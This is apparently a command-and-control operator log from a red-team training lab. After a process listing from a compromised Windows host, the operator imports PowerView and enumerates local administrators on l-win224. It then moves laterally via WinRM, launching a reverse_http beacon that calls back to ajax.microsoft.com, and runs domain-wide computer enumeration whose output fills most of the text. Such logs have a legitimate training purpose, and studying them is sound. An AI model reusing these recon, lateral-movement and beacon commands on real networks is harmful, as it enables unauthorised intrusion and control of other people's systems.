STROOP\w.tax 2 +RuntimeBroker.exe 920 7160 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6156 x64 STROOP\w.tax 2 +WaSecAgentProv.exe 3264 7512 +conhost.exe 7512 7592 +RuntimeBroker.exe 920 7824 x64 STROOP\w.tax 2 +SearchIndexer.exe 700 7900 +SearchProtocolHost.exe 7900 8040 +SearchFilterHost.exe 7900 8064 +smartscreen.exe 920 8144 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6500 6924 x64 STROOP\w.tax 2 +SecurityHealthService.exe 700 5136 +svchost.exe 700 5512 +mousedrivercontrol.exe 6500 5192 x64 STROOP\w.tax 2 +svchost.exe 700 7424 +svchost.exe 700 6940 +svchost.exe 700 892 +POWERPNT.EXE 6500 1508 x86 STROOP\w.tax 2 +svchost.exe 700 2060 +sppsvc.exe 700 3436 +RuntimeBroker.exe 920 4896 x64 STROOP\w.tax 2 +msiexec.exe 700 6644 +svchost.exe 700 6464 +SgrmBroker.exe 700 5296 +svchost.exe 700 6984 +svchost.exe 700 7344 +svchost.exe 700 6524 x64 STROOP\w.tax 2 + + +03/30 08:42:55 UTC [input] powershell-import +03/30 08:43:10 UTC [input] powershell-import +03/30 08:43:13 UTC [task] Tasked beacon to import: C:\Users\outflank\Desktop\Training\Lab7 - internal recon\PowerView.ps1 +03/30 08:43:17 UTC [checkin] host called home, sent: 101224 bytes +03/30 08:43:22 UTC [input] powershell Get-NetLocalGroup -computername l-win224 +03/30 08:43:23 UTC [task] Tasked beacon to run: Get-NetLocalGroup -computername l-win224 +03/30 08:43:27 UTC [checkin] host called home, sent: 377 bytes +03/30 08:43:31 UTC [output] +received output: +#< CLIXML + + +ComputerName : l-win224 +AccountName : STROOP/l-win224/bofh +IsDomain : False +IsGroup : False +SID : S-1-5-21-1770739200-3703860189-1291868052-500 +Description : Built-in account for administering the computer/domain +PwdLastSet : 3/29/2020 2:17:31 AM +PwdExpired : False +UserFlags : 66049 +Disabled : False +LastLogin : 3/30/2020 8:40:18 AM + +ComputerName : l-win224 +AccountName : stroop.local/Domain Admins +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-512 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win224 +AccountName : stroop.local/Domain Users +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-513 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:44:06 UTC [input] jump winrm64 L-WIN224 DFApache +03/30 08:44:06 UTC [task] Tasked beacon to run windows/beacon_http/reverse_http (ajax.microsoft.com:80) on L-WIN224 via WinRM +03/30 08:44:09 UTC [checkin] host called home, sent: 226917 bytes +03/30 08:44:19 UTC [output] +received output: +#< CLIXML + + +03/30 08:46:51 UTC [input] net computers stroop.local +03/30 08:46:51 UTC [task] Tasked beacon to run net computers on stroop.local +03/30 08:46:52 UTC [checkin] host called home, sent: 104509 bytes +03/30 08:46:53 UTC [output] +received output: +Computers in domain 'stroop.local': + + Server Name IP Address + ----------- ---------- + S-WIN21 10.1.2.10 + S-WIN22 10.2.1.10 + s-win100 unknown + s-win101 unknown + s-win102 unknown + s-win103 unknown + s-win104 unknown + s-win105 unknown + s-win106 unknown + s-win107 unknown + s-win108 unknown + s-win109 unknown + s-win110 unknown + s-win111 unknown + s-win112 unknown + s-win113 unknown + s-win114 unknown + s-win115 unknown + s-win116 unknown + s-win117 unknown + s-win118 unknown + s-win119 unknown + s-win120 unknown + s-win121 unknown + s-win122 unknown + s-win123 unknown + s-win124 unknown + s-win125 unknown + s-win126 unknown + s-win127 unknown + s-win128 unknown + s-win129 unknown + s-win130 unknown + s-win131 unknown + s-win132 unknown + s-win133 unknown + s-win134 unknown + s-win135 unknown + s-win136 unknown + s-win137 unknown + s-win138 unknown + s-win139 unknown + s-win140 unknown + s-win141 unknown + s-win142 unknown + s-win143 unknown + s-win144 unknown + s-win145 unknown + l-win1000 unknown + l-win1001 unknown + l-win1002 unknown + l-win1003 unknown + l-win1004 unknown + l-win1005 unknown + l-win1006 unknown + l-win1007 unknown + l-win1008 unknown + l-win1009 unknown + l-win1010 unknown + l-win1011 unknown + l-win1012 unknown + l-win1013 unknown + l-win1014 unknown + l-win1015 unknown + l-win1016 unknown + l-win1017 unknown + l-win1018 unknown + l-win1019 unknown + l-win1020 unknown + l-win1021 unknown + l-win1022 unknown + l-win1023 unknown + l-win1024 unknown + l-win1025 unknown + l-win1026 unknown + l-win1027 unknown + l-win1028 unknown + l-win1029 unknown + l-win1030 unknown + l-win1031 unknown + l-win1032 unknown + l-win1033 unknown + l-win1034 unknown + l-win1035 unknown + l-win1036 unknown + l-win1037 unknown + l-win1038 unknown + l-win1039 unknown + l-win1040 unknown + l-win1041 unknown + l-win1042 unknown + l-win1043 unknown + l-win1044 unknown + l-win1045 unknown + l-win1046 unknown + l-win1047 unknown + l-win1048 unknown + l-win1049 unknown + l-win1050 unknown + l-win1051 unknown + l-win1052 unknown + l-win1053 unknown + l-win1054 unknown + l-win1055 unknown + l-win1056 unknown + l-win1057 unknown + l-win1058 unknown + l-win1059 unknown + l-win1060 unknown + l-win1061 unknown + l-win1062 unknown + l-win1063 unknown + l-win1064 unknown + l-win1065 unknown + l-win1066 unknown + l-win1067 unknown + l-win1068 unknown + l-win1069 unknown + l-win1070 unknown + l-win1071 unknown + l-win1072 unknown + l-win1073 unknown + l-win1074 unknown + l-win1075 unknown + l-win1076 unknown + l-win1077 unknown + l-win1078 unknown + l-win1079 unknown + l-win1080 unknown + l-win1081 unknown + l-win1082 unknown + l-win1083 unknown + l-win1084 unknown + l-win1085 unknown + l-win1086 unknown + l-win1087 unknown + l-win1088 unknown + l-win1089 unknown + l-win1090 unknown + l-win1091 unknown + l-win1092 unknown + l-win1093 unknown + l-win1094 unknown + l-win1095 unknown + l-win1096 unknown + l-win1097 unknown + l-win1098 unknown + l-win1099 unknown + l-win1100 unknown + l-win1101 unknown + l-win1102 unknown + l-win1103 unknown + l-win1104 unknown + l-win1105 unknown + l-win1106 unknown + l-win1107 unknown + l-win1108 unknown + l-win1109 unknown + l-win1110 unknown + l-win1111 unknown + l-win1112 unknown + l-win1113 unknown + l-win1114 unknown + l-win1115 unknown + l-win1116 unknown + l-win1117 unknown + l-win1118 unknown + l-win1119 unknown + l-win1120 unknown + l-win1121 unknown + l-win1122 unknown + l-win1123 unknown + l-win1124 unknown + l-win1125 unknown + l-win1126 unknown + l-win1127 unknown + l-win1128 unknown + l-win1129 unknown + l-win1130 unknown + l-win1131 unknown + l-win1132 unknown + l-win1133 unknown + l-win1134 unknown + l-win1135 unknown + l-win1136 unknown + l-win1137 unknown + l-win1138 unknown + l-win1139 unknown + l-win1140 unknown + l-win1141 unknown + l-win1142 unknown + l-win1143 unknown + l-win1144 unknown + l-win1145 unknown + l-win1146 unknown + l-win1147 unknown + l-win1148 unknown + l-win1149 unknown + l-win1150 unknown + l-win1151 unknown + l-win1152 unknown + l-win1153 unknown + l-win1154 unknown + l-win1155 unknown + l-win1156 unknown + l-win1157 unknown + l-win1158 unknown + l-win1159 unknown + l-win1160 unknown + l-win1161 unknown + l-win1162 unknown + l-win1163 unknown + l-win1164 unknown + l-win1165 unknown + l-win1166 unknown + l-win1167 unknown + l-win1168 unknown + l-win1169 unknown + l-win1170 unknown + l-win1171 unknown + l-win1172 unknown + l-win1173 unknown + l-win1174 unknown + l-win1175 unknown + l-win1176 unknown + l-win1177 unknown + l-win1178 unknown + l-win1179 unknown + l-win1180 unknown + l-win1181 unknown + l-win1182 unknown + l-win1183 unknown + l-win1184 unknown + l-win1185 unknown + l-win1186 unknown + l-win1187 unknown + l-win1188 unknown + l-win1189 unknown + l-win1190 unknown + l-win1191 unknown + l-win1192 unknown + l-win1193 unknown + l-win1194 unknown + l-win1195 unknown + l-win1196 unknown + l-win1197 unknown + l-win1198 unknown + l-win1199 unknown + l-win1200 unknown + l-win1201 unknown + l-win1202 unknown + l-win1203 unknown + l-win1204 unknown + l-win1205 unknown + l-win1206 unknown + l-win1207 unknown + l-win1208 unknown + l-win1209 unknown + l-win1210 unknown + l-win1211 unknown + l-win1212 unknown + l-win1213 unknown + l-win1214 unknown + l-win1215 unknown + l-win1216 unknown + l-win1217 unknown + l-win1218 unknown + l-win1219 unknown + l-win1220 unknown + l-win1221 unknown + l-win1222 unknown + l-win1223 unknown + l-win1224 unknown + l-win1225 unknown + l-win1226 unknown + l-win1227 unknown + l-win1228 unknown + l-win1229 unknown + l-win1230 unknown + l-win1231 unknown + l-win1232 unknown + l-win1233 unknown + l-win1234 unknown + l-win1235 unknown + l-win1236 unknown + l-win1237 unknown + l-win1238 unknown + l-win1239 unknown + l-win1240 unknown + l-win1241 unknown + l-win1242 unknown + l-win1243 unknown + l-win1244 unknown + l-win1245 unknown + l-win1246 unknown + l-win1247 unknown + l-win1248 unknown + l-win1249 unknown + l-win1250 unknown + l-win1251 unknown + l-win1252 unknown + l-win1253 unknown + l-win1254 unknown + l-win1255 unknown + l-win1256 unknown + l-win1257 unknown + l-win1258 unknown + l-win1259 unknown + l-win1260 unknown + l-win1261 unknown + l-win1262 unknown + l-win1263 unknown + l-win1264 unknown + l-win1265 unknown + l-win1266 unknown + l-win1267 unknown + l-win1268 unknown + l-win1269 unknown + l-win1270 unknown + l-win1271 unknown + l-win1272 unknown + l-win1273 unknown + l-win1274 unknown + l-win1275 unknown + l-win1276 unknown + l-win1277 unknown + l-win1278 unknown + l-win1279 unknown + l-win1280 unknown + l-win1281 unknown + l-win1282 unknown + l-win1283 unknown + l-win1284 unknown + l-win1285 unknown + l-win1286 unknown + l-win1287 unknown + l-win1288 unknown + l-win1289 unknown + l-win1290 unknown + l-win1291 unknown + l-win1292 unknown + l-win1293 unknown + l-win1294 unknown + l-win1295 unknown + l-win1296 unknown + l-win1297 unknown + l-win1298 unknown + l-win1299 unknown + l-win1300 unknown + l-win1301 unknown + l-win1302 unknown + l-win1303 unknown + l-win1304 unknown + l-win1305 unknown + l-win1306 unknown + l-win1307 unknown + l-win1308 unknown + l-win1309 unknown + l-win1310 unknown + l-win1311 unknown + l-win1312 unknown + l-win1313 unknown + l-win1314 unknown + l-win1315 unknown + l-win1316 unknown + l-win1317 unknown + l-win1318 unknown + l-win1319 unknown + l-win1320 unknown + l-win1321 unknown + l-win1322 unknown + l-win1323 unknown + l-win1324 unknown + l-win1325 unknown + l-win1326 unknown + l-win1327 unknown + l-win1328 unknown + l-win1329 unknown + l-win1330 unknown + l-win1331 unknown + l-win1332 unknown + l-win1333 unknown + l-win1334 unknown + l-win1335 unknown + l-win1336 unknown + l-win1337 unknown + l-win1338 unknown + l-win1339 unknown + l-win1340 unknown + l-win1341 unknown + l-win1342 unknown + l-win1343 unknown + l-win1344 unknown + l-win1345 unknown + l-win1346 unknown + l-win1347 unknown + l-win1348 unknown + l-win1349 unknown + l-win1350 unknown + l-win1351 unknown + l-win1352 unknown + l-win1353 unknown + l-win1354 unknown + l-win1355 unknown + l-win1356 unknown + l-win1357 unknown + l-win1358 unknown + l-win1359 unknown + l-win1360 unknown + l-win1361 unknown + l-win1362 unknown + l-win1363 unknown + l-win1364 unknown + l-win1365 unknown + l-win1366 unknown + l-win1367 unknown + l-win1368 unknown + l-win1369 unknown + l-win1370 unknown + l-win1371 unknown + l-win1372 unknown + l-win1373 unknown + l-win1374 unknown + l-win1375 unknown + l-win1376 unknown + l-win1377 unknown + l-win1378 unknown + l-win1379 unknown + l-win1380 unknown + l-win1381 unknown + l-win1382 unknown + l-win1383 unknown + l-win1384 unknown + l-win1385 unknown + l-win1386 unknown + l-win1387 unknown + l-win1388 unknown + l-win1389 unknown + l-win1390 unknown + l-win1391 unknown + l-win1392 unknown + l-win1393 unknown + l-win1394 unknown + l-win1395 unknown + l-win1396 unknown + l-win1397 unknown + l-win1398 unknown + l-win1399 unknown + l-win1400 unknown + + +03/30 08:46:58 UTC [output] +received output: + l-win1401 unknown + l-win1402 unknown + l-win1403 unknown + l-win1404 unknown + l-win1405 unknown + l-win1406 unknown + l-win1407 unknown + l-win1408 unknown + l-win1409 unknown + l-win1410 unknown + l-win1411 unknown + l-win1412 unknown + l-win1413 unknown + l-win1414 unknown + l-win1415 unknown + l-win1416 unknown + l-win1417 unknown + l-win1418 unknown + l-win1419 unknown + l-win1420 unknown + l-win1421 unknown + l-win1422 unknown + l-win1423 unknown + l-win1424 unknown + l-win1425 unknown + l-win1426 unknown + l-win1427 unknown + l-win1428 unknown + l-win1429 unknown + l-win1430 unknown + l-win1431 unknown + l-win1432 unknown + l-win1433 unknown + l-win1434 unknown + l-win1435 unknown + l-win1436 unknown + l-win1437 unknown + l-win1438 unknown + l-win1439 unknown + l-win1440 unknown + l-win1441 unknown + l-win1442 unknown + l-win1443 unknown + l-win1444 unknown + l-win1445 unknown + l-win1446 unknown + l-win1447 unknown + l-win1448 unknown + l-win1449 unknown + l-win1450 unknown + l-win1451 unknown + l-win1452 unknown + l-win1453 unknown + l-win1454 unknown + l-win1455 unknown + l-win1456 unknown + l-win1457 unknown + l-win1458 unknown + l-win1459 unknown + l-win1460 unknown + l-win1461 unknown + l-win1462 unknown + l-win1463 unknown + l-win1464 unknown + l-win1465 unknown + l-win1466 unknown + l-win1467 unknown + l-win1468 unknown + l-win1469 unknown + l-win1470 unknown + l-win1471 unknown + l-win1472 unknown + l-win1473 unknown + l-win1474 unknown + l-win1475 unknown + l-win1476 unknown + l-win1477 unknown + l-win1478 unknown + l-win1479 unknown + l-win1480 unknown + l-win1481 unknown + l-win1482 unknown + l-win1483 unknown + l-win1484 unknown + l-win1485 unknown + l-win1486 unknown + l-win1487 unknown + l-win1488 unknown + l-win1489 unknown + l-win1490 unknown + l-win1491 unknown + l-win1492 unknown + l-win1493 unknown + l-win1494 unknown + l-win1495 unknown + l-win1496 unknown + l-win1497 unknown + l-win1498 unknown + l-win1499 unknown + l-win1500 unknown + l-win1501 unknown + l-win1502 unknown + l-win1503 unknown + l-win1504 unknown + l-win1505 unknown + l-win1506 unknown + l-win1507 unknown + l-win1508 unknown + l-win1509 unknown + l-win1510 unknown + l-win1511 unknown + l-win1512 unknown + l-win1513 unknown + l-win1514 unknown + l-win1515 unknown + l-win1516 unknown + l-win1517 unknown + l-win1518 unknown + l-win1519 unknown + l-win1520 unknown + l-win1521 unknown + l-win1522 unknown + l-win1523 unknown + l-win1524 unknown + l-win1525 unknown + l-win1526 unknown + l-win1527 unknown + l-win1528 unknown + l-win1529 unknown + l-win1530 unknown + l-win1531 unknown + l-win1532 unknown + l-win1533 unknown + l-win1534 unknown + l-win1535 unknown + l-win1536 unknown + l-win1537 unknown + l-win1538 unknown + l-win1539 unknown + l-win1540 unknown + l-win1541 unknown + l-win1542 unknown + l-win1543 unknown + l-win1544 unknown + l-win1545 unknown + l-win1546 unknown + l-win1547 unknown + l-win1548 unknown + l-win1549 unknown + l-win1550 unknown + l-win1551 unknown + l-win1552 unknown + l-win1553 unknown + l-win1554 unknown + l-win1555 unknown + l-win1556 unknown + l-win1557 unknown + l-win1558 unknown + l-win1559 unknown + l-win1560 unknown + l-win1561 unknown + l-win1562 unknown + l-win1563 unknown + l-win1564 unknown + l-win1565 unknown + l-win1566 unknown + l-win1567 unknown + l-win1568 unknown + l-win1569 unknown + l-win1570 unknown + l-win1571 unknown + l-win1572 unknown + l-win1573 unknown + l-win1574 unknown + l-win1575 unknown + l-win1576 unknown + l-win1577 unknown + l-win1578 unknown + l-win1579 unknown + l-win1580 unknown + l-win1581 unknown + l-win1582 unknown + l-win1583 unknown + l-win1584 unknown + l-win1585 unknown + l-win1586 unknown + l-win1587 unknown + l-win1588 unknown + l-win1589 unknown + l-win1590 unknown + l-win1591 unknown + l-win1592 unknown + l-win1593 unknown + l-win1594 unknown + l-win1595 unknown + l-win1596 unknown + l-win1597 unknown + l-win1598 unknown + l-win1599 unknown + l-win1600 unknown + l-win1601 unknown + l-win1602 unknown + l-win1603 unknown + l-win1604 unknown + l-win1605 unknown + l-win1606 unknown + l-win1607 unknown + l-win1608 unknown + l-win1609 unknown + l-win1610 unknown + l-win1611 unknown + l-win1612 unknown + l-win1613 unknown + l-win1614 unknown + l-win1615 unknown + l-win1616 unknown + l-win1617 unknown + l-win1618 unknown + l-win1619 unknown + l-win1620 unknown + l-win1621 unknown + l-win1622 unknown + l-win1623 unknown + l-win1624 unknown + l-win1625 unknown + l-win1626 unknown + l-win1627 unknown + l-win1628 unknown + l-win1629 unknown + l-win1630 unknown + l-win1631 unknown + l-win1632 unknown + l-win1633 unknown + l-win1634 unknown + l-win1635 unknown + l-win1636 unknown + l-win1637 unknown + l-win1638 unknown + l-win1639 unknown + l-win1640 unknown + l-win1641 unknown + l-win1642 unknown + l-win1643 unknown + l-win1644 unknown + l-win1645 unknown + l-win1646 unknown + l-win1647 unknown + l-win1648 unknown + l-win1649 unknown + l-win1650 unknown + l-win1651 unknown + l-win1652 unknown + l-win1653 unknown + l-win1654 unknown + l-win1655 unknown + l-win1656 unknown + l-win1657 unknown + l-win1658 unknown + l-win1659 unknown + l-win1660 unknown + l-win1661 unknown + l-win1662 unknown + l-win1663 unknown + l-win1664 unknown + l-win1665 unknown + l-win1666 unknown + l-win1667 unknown + l-win1668 unknown + l-win1669 unknown + l-win1670 unknown + l-win1671 unknown + l-win1672 unknown + l-win1673 unknown + l-win1674 unknown + l-win1675 unknown + l-win1676 unknown + l-win1677 unknown + l-win1678 unknown + l-win1679 unknown + l-win1680 unknown + l-win1681 unknown + l-win1682 unknown + l-win1683 unknown + l-win1684 unknown + l-win1685 unknown + l-win1686 unknown + l-win1687 unknown + l-win1688 unknown + l-win1689 unknown + l-win1690 unknown + l-win1691 unknown + l-win1692 unknown + l-win1693 unknown + l-win1694 unknown + l-win1695 unknown + l-win1696 unknown + l-win1697 unknown + l-win1698 unknown + l-win1699 unknown + l-win1700 unknown + l-win1701 unknown + l-win1702 unknown + l-win1703 unknown + l-win1704 unknown + l-win1705 unknown + l-win1706 unknown + l-win1707 unknown + l-win1708 unknown + l-win1709 unknown + l-win1710 unknown + l-win1711 unknown + l-win1712 unknown + l-win1713 unknown + l-win1714 unknown + l-win1715 unknown + l-win1716 unknown + l-win1717 unknown + l-win1718 unknown + l-win1719 unknown + l-win1720 unknown + l-win1721 unknown + l-win1722 unknown + l-win1723 unknown + l-win1724 unknown + l-win1725 unknown + l-win1726 unknown + l-win1727 unknown + l-win1728 unknown + l-win1729 unknown + l-win1730 unknown + l-win1731 unknown + l-win1732 unknown + l-win1733 unknown + l-win1734 unknown + l-win1735 unknown + l-win1736 unknown + l-win1737 unknown + l-win1738 unknown + l-win1739 unknown + l-win1740 unknown + l-win1741 unknown + l-win1742 unknown + l-win1743 unknown + l-win1744 unknown + l-win1745 unknown + l-win1746 unknown + l-win1747 unknown + l-win1748 unknown + l-win1749 unknown + l-win1750 unknown + l-win1751 unknown + l-win1752 unknown + l-win1753 unknown + l-win1754 unknown + l-win1755 unknown + l-win1756 unknown + l-win1757 unknown + l-win1758 unknown + l-win1759 unknown + l-win1760 unknown + l-win1761 unknown + l-win1762 unknown + l-win1763 unknown + l-win1764 unknown + l-win1765 unknown + l-win1766 unknown + l-win1767 unknown + l-win1768 unknown + l-win1769 unknown + l-win1770 unknown + l-win1771 unknown + l-win1772 unknown + l-win1773 unknown + l-win1774 unknown + l-win1775 unknown + l-win1776 unknown + l-win1777 unknown + l-win1778 unknown + l-win1779 unknown + l-win1780 unknown + l-win1781 unknown + l-win1782 unknown + l-win1783 unknown + l-win1784 unknown + l-win1785 unknown + l-win1786 unknown + l-win1787 unknown + l-win1788 unknown + l-win1789 unknown + l-win1790 unknown + l-win1791 unknown + l-win1792 unknown + l-win1793 unknown + l-win1794 unknown + l-win1795 unknown + l-win1796 unknown + l-win1797 unknown + l-win1798 unknown + l-win1799 unknown + l-win1800 unknown + l-win1801 unknown + l-win1802 unknown + l-win1803 unknown + l-win1804 unknown + l-win1805 unknown + l-win1806 unknown + l-win1807 unknown + l-win1808 unknown + l-win1809 unknown + l-win1810 unknown + l-win1811 unknown + l-win1812 unknown + l-win1813 unknown + l-win1814 unknown + l-win1815 unknown + l-win1816 unknown + l-win1817 unknown + l-win1818 unknown + l-win1819 unknown + l-win1820 unknown + l-win1821 unknown + l-win1822 unknown + l-win1823 unknown + l-win1824 unknown + l-win1825 unknown + l-win1826 unknown + l-win1827 unknown + l-win1828 unknown + l-win1829 unknown + l-win1830 unknown + l-win1831 unknown + l-win1832 unknown + l-win1833 unknown + l-win1834 unknown + l-win1835 unknown + l-win1836 unknown + l-win1837 unknown + l-win1838 unknown + l-win1839 unknown + l-win1840 unknown + l-win1841 unknown + l-win1842 unknown + l-win1843 unknown + l-win1844 unknown + l-win1845 unknown + l-win1846 unknown + l-win1847 unknown + l-win1848 unknown + l-win1849 unknown + l-win1850 unknown + l-win1851 unknown + l-win1852 unknown + l-win1853 unknown + l-win1854 unknown + l-win1855 unknown + l-win1856 unknown + l-win1857 unknown + l-win1858 unknown + l-win1859 unknown + l-win1860 unknown + l-win1861 unknown + l-win1862 unknown + l-win1863 unknown + l-win1864 unknown + l-win1865 unknown + l-win1866 unknown + l-win1867 unknown + l-win1868 unknown + l-win1869 unknown + l-win1870 unknown + l-win1871 unknown + l-win1872 unknown + l-win1873 unknown + l-win1874 unknown + l-win1875 unknown + l-win1876 unknown + l-win1877 unknown + l-win1878 unknown + + +03/30 08:47:03 UTC [output] +received output: + l-win1879 unknown + l-win1880 unknown + l-win1881 unknown + l-win1882 unknown + l-win1883 unknown + l-win1884 unknown + l-win1885 unknown + l-win1886 unknown + l-win1887 unknown + l-win1888 unknown + l-win1889 unknown + l-win1890 unknown + l-win1891 unknown + l-win1892 unknown + l-win1893 unknown + l-win1894 unknown + l-win1895 unknown + l-win1896 unknown + l-win1897 unknown + l-win1898 unknown + l-win1899 unknown + l-win1900 unknown + l-win1901 unknown + l-win1902 unknown + l-win1903 unknown + l-win1904 unknown + l-win1905 unknown + l-win1906 unknown + l-win1907 unknown + l-win1908 unknown + l-win1909 unknown + l-win1910 unknown + l-win1911 unknown + l-win1912 unknown + l-win1913 unknown + l-win1914 unknown + l-win1915 unknown + l-win1916 unknown + l-win1917 unknown + l-win1918 unknown + l-win1919 unknown + l-win1920 unknown + l-win1921 unknown + l-win1922 unknown + l-win1923 unknown + l-win1924 unknown + l-win1925 unknown + l-win1926 unknown + l-win1927 unknown + l-win1928 unknown + l-win1929 unknown + l-win1930 unknown + l-win1931 unknown + l-win1932 unknown + l-win1933 unknown + l-win1934 unknown + l-win1935 unknown + l-win1936 unknown + l-win1937 unknown + l-win1938 unknown + l-win1939 unknown + l-win1940 unknown + l-win1941 unknown + l-win1942 unknown + l-win1943 unknown + l-win1944 unknown + l-win1945 unknown + l-win1946 unknown + l-win1947 unknown + l-win1948 unknown + l-win1949 unknown + l-win1950 unknown + l-win1951 unknown + l-win1952 unknown + l-win1953 unknown + l-win1954 unknown + l-win1955 unknown + l-win1956 unknown + l-win1957 unknown + l-win1958 unknown + l-win1959 unknown + l-win1960 unknown + l-win1961 unknown + l-win1962 unknown + l-win1963 unknown + l-win1964 unknown + l-win1965 unknown + l-win1966 unknown + l-win1967 unknown + l-win1968 unknown + l-win1969 unknown + l-win1970 unknown + l-win1971 unknown + l-win1972 unknown + l-win1973 unknown + l-win1974 unknown + l-win1975 unknown + l-win1976 unknown + l-win1977 unknown + l-win1978 unknown + l-win1979 unknown + l-win1980 unknown + l-win1981 unknown + l-win1982 unknown + l-win1983 unknown + l-win1984 unknown + l-win1985 unknown + l-win1986 unknown + l-win1987 unknown + l-win1988 unknown + l-win1989 unknown + l-win1990 unknown + l-win1991 unknown + l-win1992 unknown + l-win1993 unknown + l-win1994 unknown + l-win1995 unknown + l-win1996 unknown + l-win1997 unknown + l-win1998 unknown + l-win1999 unknown + l-win2000 unknown + l-win2001 unknown + l-win2002 unknown + l-win2003 unknown + l-win2004 unknown + l-win2005 unknown + l-win2006 unknown + l-win2007 unknown + l-win2008 unknown + l-win2009 unknown + l-win2010 unknown + l-win2011 unknown + l-win2012 unknown + l-win2013 unknown + l-win2014 unknown + l-win2015 unknown + l-win2016 unknown + l-win2017 unknown + l-win2018 unknown + l-win2019 unknown + l-win2020 unknown + l-win2021 unknown + l-win2022 unknown + l-win2023 unknown + l-win2024 unknown + l-win2025 unknown + l-win2026 unknown + l-win2027 unknown + l-win2028 unknown + l-win2029 unknown + l-win2030 unknown + l-win2031 unknown + l-win2032 unknown + l-win2033 unknown + l-win2034 unknown + l-win2035 unknown + l-win2036 unknown + l-win2037 unknown + l-win2038 unknown + l-win2039 unknown + l-win2040 unknown + l-win2041 unknown + l-win2042 unknown + l-win2043 unknown + l-win2044 unknown + l-win2045 unknown + l-win2046 unknown + l-win2047 unknown + l-win2048 unknown + l-win2049 unknown + l-win2050 unknown + l-win2051 unknown + l-win2052 unknown + l-win2053 unknown + l-win2054 unknown + l-win2055 unknown + l-win2056 unknown + l-win2057 unknown + l-win2058 unknown + l-win2059 unknown + l-win2060 unknown + l-win2061 unknown + l-win2062 unknown + l-win2063 unknown + l-win2064 unknown + l-win2065 unknown + l-win2066 unknown + l-win2067 unknown + l-win2068 unknown + l-win2069 unknown + l-win2070 unknown + l-win2071 unknown + l-win2072 unknown + l-win2073 unknown + l-win2074 unknown + l-win2075 unknown + l-win2076 unknown + l-win2077 unknown + l-win2078 unknown + l-win2079 unknown + l-win2080 unknown + l-win2081 unknown + l-win2082 unknown + l-win2083 unknown + l-win2084 unknown + l-win2085 unknown + l-win2086 unknown + l-win2087 unknown + l-win2088 unknown + l-win2089 unknown + l-win2090 unknown + l-win2091 unknown + l-win2092 unknown + l-win2093 unknown + l-win2094 unknown + l-win2095 unknown + l-win2096 unknown + l-win2097 unknown + l-win2098 unknown + l-win2099 unknown + l-win2100 unknown + l-win2101 unknown + l-win2102 unknown + l-win2103 unknown + l-win2104 unknown + l-win2105 unknown + l-win2106 unknown + l-win2107 unknown + l-win2108 unknown + l-win2109 unknown + l-win2110 unknown + l-win2111 unknown + l-win2112 unknown + l-win2113 unknown + l-win2114 unknown + l-win2115 unknown + l-win2116 unknown + l-win2117 unknown + l-win2118 unknown + l-win2119 unknown + l-win2120 unknown + l-win2121 unknown + l-win2122 unknown + l-win2123 unknown + l-win2124 unknown + l-win2125 unknown + l-win2126 unknown + l-win2127 unknown + l-win2128 unknown + l-win2129 unknown + l-win2130 unknown + l-win2131 unknown + l-win2132 unknown + l-win2133 unknown + l-win2134 unknown + l-win2135 unknown + l-win2136 unknown + l-win2137 unknown + l-win2138 unknown + l-win2139 unknown + l-win2140 unknown + l-win2141 unknown + l-win2142 unknown + l-win2143 unknown + l-win2144 unknown + l-win2145 unknown + l-win2146 unknown + l-win2147 unknown + l-win2148 unknown + l-win2149 unknown + l-win2150 unknown + l-win2151 unknown + l-win2152 unknown + l-win2153 unknown + l-win2154 unknown + l-win2155 unknown + l-win2156 unknown + l-win2157 unknown + l-win2158 unknown + l-win2159 unknown + l-win2160 unknown + l-win2161 unknown + l-win2162 unknown + l-win2163 unknown + l-win2164 unknown + l-win2165 unknown + l-win2166 unknown + l-win2167 unknown + l-win2168 unknown + l-win2169 unknown + l-win2170 unknown + l-win2171 unknown + l-win2172 unknown + l-win2173 unknown + l-win2174 unknown + l-win2175 unknown + l-win2176 unknown + l-win2177 unknown + l-win2178 unknown + l-win2179 unknown + l-win2180 unknown + l-win2181 unknown + l-win2182 unknown + l-win2183 unknown + l-win2184 unknown + l-win2185 unknown + l-win2186 unknown + l-win2187 unknown + l-win2188 unknown + l-win2189 unknown + l-win2190 unknown + l-win2191 unknown + l-win2192 unknown + l-win2193 unknown + l-win2194 unknown + l-win2195 unknown + l-win2196 unknown + l-win2197 unknown + l-win2198 unknown + l-win2199 unknown + l-win2200 unknown + l-win2201 unknown + l-win2202 unknown + l-win2203 unknown + l-win2204 unknown + l-win2205 unknown + l-win2206 unknown + l-win2207 unknown + l-win2208 unknown + l-win2209 unknown + l-win2210 unknown + l-win2211 unknown + l-win2212 unknown + l-win2213 unknown + l-win2214 unknown + l-win2215 unknown + l-win2216 unknown + l-win2217 unknown + l-win2218 unknown + l-win2219 unknown + l-win2220 unknown + l-win2221 unknown + l-win2222 unknown + l-win2223 unknown + l-win2224 unknown + l-win2225 unknown + l-win2226 unknown + l-win2227 unknown + l-win2228 unknown + l-win2229 unknown + l-win2230 unknown + l-win2231 unknown + l-win2232 unknown + l-win2233 unknown + l-win2234 unknown + l-win2235 unknown + l-win2236 unknown + l-win2237 unknown + l-win2238 unknown + l-win2239 unknown + l-win2240 unknown + l-win2241 unknown + l-win2242 unknown + l-win2243 unknown + l-win2244 unknown + l-win2245 unknown + l-win2246 unknown + l-win2247 unknown + l-win2248 unknown + l-win2249 unknown + l-win2250 unknown + l-win2251 unknown + l-win2252 unknown + l-win2253 unknown + l-win2254 unknown + l-win2255 unknown + l-win2256 unknown + l-win2257 unknown + l-win2258 unknown + l-win2259 unknown + l-win2260 unknown + l-win2261 unknown + l-win2262 unknown + l-win2263 unknown + l-win2264 unknown + l-win2265 unknown + l-win2266 unknown + l-win2267 unknown + l-win2268 unknown + l-win2269 unknown + l-win2270 unknown + l-win2271 unknown + l-win2272 unknown + l-win2273 unknown + l-win2274 unknown + l-win2275 unknown + l-win2276 unknown + l-win2277 unknown + l-win2278 unknown + l-win2279 unknown + l-win2280 unknown + s-lin100 unknown + s-lin101 unknown + s-lin102 unknown + s-lin103 unknown + s-lin104 unknown + s-lin105 unknown + s-lin106 unknown + s-lin107 